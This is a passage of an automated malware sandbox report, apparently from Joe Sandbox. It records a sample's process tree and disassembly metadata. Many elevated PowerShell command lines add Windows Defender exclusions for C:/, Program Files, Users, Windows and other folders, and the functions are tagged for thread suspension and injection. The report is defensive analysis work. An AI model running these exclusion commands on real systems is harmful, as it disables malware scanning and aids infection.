                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:56
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:57
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6068e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:58
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:59
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:60
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:61
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:62
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:63
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:64
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:65
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:66
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:67
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:68
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:69
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:70
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:71
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:72
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:73
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:74
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:75
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:76
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:77
                                                                                                Start time:14:37:27
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:78
                                                                                                Start time:14:37:27
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:79
                                                                                                Start time:14:37:37
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                Imagebase:0x7ff7e52b0000
                                                                                                File size:55'320 bytes
                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:3.4%
                                                                                                  Dynamic/Decrypted Code Coverage:75%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:12
                                                                                                  Total number of Limit Nodes:0
                                                                                                  execution_graph 11902 7ff848fb2395 11903 7ff848fb23af GetFileAttributesW 11902->11903 11905 7ff848fb2475 11903->11905 11906 7ff848fb0548 11907 7ff848fb0583 ResumeThread 11906->11907 11909 7ff848fb0654 11907->11909 11910 7ff848fb06a9 11911 7ff848fb06b7 CloseHandle 11910->11911 11913 7ff848fb0794 11911->11913 11898 7ff848faed7d 11899 7ff848faed8b SuspendThread 11898->11899 11901 7ff848faee64 11899->11901

                                                                                                  Executed Functions

                                                                                                  Function 00007FF848DF0D67 Relevance: .3, Instructions: 278COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 104 7ff848df0d67-7ff848df0d7f 105 7ff848df0d82-7ff848df0db9 104->105 106 7ff848df0d81 104->106 108 7ff848df0dc0-7ff848df0e4c call 7ff848df07d0 105->108 109 7ff848df0dbb 105->109 106->105 121 7ff848df0e4d-7ff848df0ebe 108->121 109->108 126 7ff848df0ec0-7ff848df0fa3 121->126 136 7ff848df0fab-7ff848df109c 126->136
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e1d34edc9bc4135671eaf306a456b5e49c6b86011a638bdc03e79072788e140d
                                                                                                  • Instruction ID: 46c967924a448505010d82359891a28280fb9b580b3e1e03bf9cc247576ede1e
                                                                                                  • Opcode Fuzzy Hash: e1d34edc9bc4135671eaf306a456b5e49c6b86011a638bdc03e79072788e140d
                                                                                                  • Instruction Fuzzy Hash: 1EA1DB7591DA9D9FE789EB28C8643A97FE1FB96310F4400BAC14DD72C2CBB81819CB50
                                                                                                  Function 00007FF848FB0548 Relevance: 1.7, APIs: 1, Instructions: 163threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2265679344.00007FF848FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848fa0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: d6ac940034cea69ce226f864c5f6c9490b433f1b1c146b06f1d1f67c4f3dd4a9
                                                                                                  • Instruction ID: 44d59b51c53a59d9c47269055f57694b3f7a3dab0e1fa9a4777526d80032ebd5
                                                                                                  • Opcode Fuzzy Hash: d6ac940034cea69ce226f864c5f6c9490b433f1b1c146b06f1d1f67c4f3dd4a9
                                                                                                  • Instruction Fuzzy Hash: 9051697090C78C8FDB59EFA8C855AE9BFF0EB56310F0441AFD449D7292DA34A886CB15
                                                                                                  Function 00007FF848FAED7D Relevance: 1.6, APIs: 1, Instructions: 143threadinjectionCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 10 7ff848faed7d-7ff848faed89 11 7ff848faed94-7ff848faee62 SuspendThread 10->11 12 7ff848faed8b-7ff848faed93 10->12 16 7ff848faee64 11->16 17 7ff848faee6a-7ff848faeeb4 11->17 12->11 16->17
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2265679344.00007FF848FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848fa0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: SuspendThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 3178671153-0
                                                                                                  • Opcode ID: d714b466fa01b9db745425e587c480e4e0e473e4db97ec8825c2bb45ad31fa7f
                                                                                                  • Instruction ID: 3aa54b0a570260643481728fba6b5f74eee60790a1e2ce7471527446c644a34b
                                                                                                  • Opcode Fuzzy Hash: d714b466fa01b9db745425e587c480e4e0e473e4db97ec8825c2bb45ad31fa7f
                                                                                                  • Instruction Fuzzy Hash: 0B414C70D0864C8FDB58DFA8D885AEDBBF0FB5A310F10416AD04DE7292DB71A845CB45
                                                                                                  Function 00007FF848FB2395 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 20 7ff848fb2395-7ff848fb2473 GetFileAttributesW 24 7ff848fb2475 20->24 25 7ff848fb247b-7ff848fb24b9 20->25 24->25
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2265679344.00007FF848FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848fa0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 64afa78f5e7d9fae1e7149a076fd2905d37defe6722e1f7acfd27c8acd1d7685
                                                                                                  • Instruction ID: 9b015ed4f8810654bb70b510723376ae266ee8bb66eceae9538fc1e9bac34ee3
                                                                                                  • Opcode Fuzzy Hash: 64afa78f5e7d9fae1e7149a076fd2905d37defe6722e1f7acfd27c8acd1d7685
                                                                                                  • Instruction Fuzzy Hash: 3F410870908A5C8FDB98DF98D885BEDBBF0FB6A310F10416ED049E7252DA71A885CF45
                                                                                                  Function 00007FF848FB06A9 Relevance: 1.4, APIs: 1, Instructions: 145COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 27 7ff848fb06a9-7ff848fb06b5 28 7ff848fb06c0-7ff848fb0792 CloseHandle 27->28 29 7ff848fb06b7-7ff848fb06bf 27->29 33 7ff848fb0794 28->33 34 7ff848fb079a-7ff848fb07ee 28->34 29->28 33->34
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2265679344.00007FF848FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848fa0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 2962429428-0
                                                                                                  • Opcode ID: 3511f4f229cf7811761398209919b8bda168c8b8a24e25047ecfbacd635eea76
                                                                                                  • Instruction ID: f5e4e299187f48e4c0f1a5a4e4874c5ad3df64fce9a320ecf11b88365ce34830
                                                                                                  • Opcode Fuzzy Hash: 3511f4f229cf7811761398209919b8bda168c8b8a24e25047ecfbacd635eea76
                                                                                                  • Instruction Fuzzy Hash: D0416D30D0865C8FDB58EFA8C885BECBBF0EF56310F1441AAD449D7292DB34A845CB55
                                                                                                  Function 00007FF848DF0960 Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 37 7ff848df0960 38 7ff848df0965-7ff848df0997 37->38
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 5H
                                                                                                  • API String ID: 0-1325928868
                                                                                                  • Opcode ID: b328601d50b01f1da31c2c5e9053bb2371ae4e6442807817297acafda7b18482
                                                                                                  • Instruction ID: d36dd734bf43b92bac515e3467b13483dbb6e4d5c57c6119b74afc3ccbbcb54e
                                                                                                  • Opcode Fuzzy Hash: b328601d50b01f1da31c2c5e9053bb2371ae4e6442807817297acafda7b18482
                                                                                                  • Instruction Fuzzy Hash: 1C415A30A18A1D9FEB44FFA8D485AED7BA1FF58350F00017AE40DE7296DF34A8418B94
                                                                                                  Function 00007FF848DF0998 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 5H
                                                                                                  • API String ID: 0-1325928868
                                                                                                  • Opcode ID: 8080c18a76c78ed03364025ac41a3ee12b67c28a61db566b5959342daf8b1641
                                                                                                  • Instruction ID: 1c067265b791426d382b915f63c6d10bdd0675e5c003719a69caf0d5512e9416
                                                                                                  • Opcode Fuzzy Hash: 8080c18a76c78ed03364025ac41a3ee12b67c28a61db566b5959342daf8b1641
                                                                                                  • Instruction Fuzzy Hash: BE412770918A5D9FDB84EF98C895AEDBBF1FF58341F10017AE409E3295DB34A841CB84
                                                                                                  Function 00007FF848DF5D2C Relevance: .2, Instructions: 177COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: eeb1822713e2b8c2e426e5266af1de66f7a43bb6a12efd3439b2c85339d53a6f
                                                                                                  • Instruction ID: 6ad4063f541371bd309bc7c857562cbfc9809924344ebf94cc4b40c216c0f169
                                                                                                  • Opcode Fuzzy Hash: eeb1822713e2b8c2e426e5266af1de66f7a43bb6a12efd3439b2c85339d53a6f
                                                                                                  • Instruction Fuzzy Hash: AF719770D0A52A8FEBA4EF14C858BBCB6B5EB54341F5001FAD20DE7291DF746A859F08
                                                                                                  Function 00007FF848DF0BB5 Relevance: .1, Instructions: 134COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7b807ea24209e4ab89078cf3b14a0a78fcc4346a4a1179a9b4f878580678fb33
                                                                                                  • Instruction ID: 241204e58661c4ded38bca691d73d1b4ddf9bc0cdfe946575f8cf9f6678c8910
                                                                                                  • Opcode Fuzzy Hash: 7b807ea24209e4ab89078cf3b14a0a78fcc4346a4a1179a9b4f878580678fb33
                                                                                                  • Instruction Fuzzy Hash: 6F41F371E0D69A8FEB02BB68D8052FC3BA0FF45354F040576D6489B1D2DB386949C799
                                                                                                  Function 00007FF848DF0908 Relevance: .1, Instructions: 133COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 263 7ff848df0908-7ff848e08514 265 7ff848e0851b-7ff848e08521 263->265 266 7ff848e08516 263->266 267 7ff848e085f5-7ff848e085fb 265->267 266->265 268 7ff848e08601-7ff848e0860a 267->268 269 7ff848e08526-7ff848e0855c 267->269 271 7ff848e08562-7ff848e085cf 269->271 276 7ff848e085ed-7ff848e085f2 271->276 277 7ff848e085d1-7ff848e085da 271->277 276->267 277->276 278 7ff848e085dc-7ff848e085ec 277->278
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 30f5268d5c080133a9e4895fcd041d0ad4fdc1435f5a17944ff2767ca3a3fada
                                                                                                  • Instruction ID: f2192d9097a775275c385b3253147b004f7f6de4581a456bb5397daa0cc35dbc
                                                                                                  • Opcode Fuzzy Hash: 30f5268d5c080133a9e4895fcd041d0ad4fdc1435f5a17944ff2767ca3a3fada
                                                                                                  • Instruction Fuzzy Hash: 7C517A30A0891D9FCF84EF58D884AED7BF1FB58354F050169E409E7260DB34E890CB90
                                                                                                  Function 00007FF848DF08F8 Relevance: .1, Instructions: 82COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6e439a045bd61c295a0555a280d9f32923ec128ae9b268cba16838d9e62df0f4
                                                                                                  • Instruction ID: a41abe93499a5bfae8f13be9f1dcee315c7547b1dddc60a295bbdba2d4aba2aa
                                                                                                  • Opcode Fuzzy Hash: 6e439a045bd61c295a0555a280d9f32923ec128ae9b268cba16838d9e62df0f4
